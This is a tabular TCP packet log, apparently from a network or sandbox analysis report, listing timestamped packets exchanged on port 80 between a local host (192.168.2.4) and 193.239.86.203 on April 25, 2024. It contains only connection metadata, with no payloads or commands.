Apr 25, 2024 21:36:48.374953985 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374969959 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374991894 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375021935 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375072956 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375101089 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375140905 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375174046 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375178099 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375266075 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375323057 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375387907 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375387907 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375432014 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375441074 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375472069 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375606060 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375663996 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375700951 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375736952 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375756025 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375786066 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375794888 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375850916 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375850916 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375885963 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375911951 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375931025 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.375938892 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375956059 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.375994921 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376086950 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376112938 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376144886 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376176119 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376219034 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376255989 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376276970 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376297951 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376307011 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376342058 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376353025 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376384974 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376418114 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376466990 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376507044 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376549959 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376601934 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376627922 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376660109 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376688004 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376770973 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376828909 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376854897 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376913071 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.376913071 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376962900 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.376982927 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377002001 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377042055 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377064943 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377077103 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377095938 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377135992 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377146959 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377196074 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377196074 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377207994 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377243996 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377266884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377296925 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377305984 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377357960 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377360106 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377403021 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377424955 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377481937 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.377516985 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377532959 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.377563953 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684010029 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684062004 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684092045 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684124947 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684139967 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684402943 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684446096 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684463978 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684484959 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684504986 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684540987 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684562922 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684602022 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684618950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684673071 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684691906 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684731007 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684737921 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684770107 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684778929 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684809923 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684815884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684848070 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684861898 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684889078 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684895992 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684936047 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684947968 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.684978008 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.684988976 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685014963 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685025930 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685054064 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685060024 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685094118 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685110092 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685129881 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685148001 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685168982 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685206890 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685225964 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685240984 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685255051 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685281038 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685328960 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685339928 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685378075 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685395002 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685426950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685431004 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685471058 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685484886 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685509920 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685525894 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685549974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685560942 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685587883 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685601950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685621977 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685638905 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685682058 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685724974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685741901 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685765982 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685780048 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685812950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685843945 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685882092 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685898066 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685920954 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685934067 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685956001 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.685977936 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.685993910 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686031103 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686039925 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686069965 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686081886 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686109066 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686124086 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686147928 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686155081 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686187983 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686203003 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686222076 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686244965 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686259985 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686297894 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686311960 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686336994 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686348915 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686374903 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686383009 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686412096 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686427116 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686453104 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686465979 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686494112 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686500072 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686532974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686547995 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686575890 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686594009 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686619043 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686657906 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686670065 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686691999 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686709881 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686764002 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686803102 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686815977 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686841011 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686850071 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686880112 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686897039 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686919928 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.686930895 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.686970949 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687025070 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687063932 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687082052 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687102079 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687114954 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687155008 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687304020 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687361956 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687720060 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687757969 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.687783957 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.687802076 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.688075066 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.688134909 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.688153028 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.688191891 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.688210011 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.688242912 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.688262939 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.689347982 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.689387083 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.689419985 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.689419985 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.689446926 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690592051 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690644026 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690707922 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690747976 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690764904 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690788031 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690800905 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690828085 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690844059 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690865993 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690881014 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690903902 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690920115 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690944910 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690960884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.690984964 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.690998077 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691025019 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691031933 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691063881 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691078901 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691102982 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691122055 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691142082 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691154957 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691181898 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691190004 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691215992 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691234112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691255093 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691293955 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691302061 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691330910 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691346884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691370010 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691382885 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691409111 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691417933 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691456079 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691462040 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691492081 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691514969 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691530943 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691535950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691569090 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691581011 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691608906 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691628933 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691648006 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691683054 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691721916 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691744089 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691760063 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691765070 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691798925 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691821098 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691837072 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691850901 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691870928 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691905975 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.691909075 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691950083 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.691987991 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692001104 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692022085 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692025900 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692044020 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692065954 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692121029 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692127943 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692127943 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692161083 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692198992 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692207098 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692226887 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692234039 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692270041 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692276001 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692308903 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692344904 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692353010 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692373991 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692384005 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692420959 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692428112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692428112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692459106 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692466974 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692497969 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692502975 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692537069 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692548990 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692574978 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692584991 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692614079 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692631960 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692652941 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692667007 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692692041 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692708969 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692733049 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692744017 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692770004 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692780018 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692805052 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692819118 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692842007 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692878962 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692888021 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692918062 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692933083 CEST	49735	80	192.168.2.4	193.239.86.203
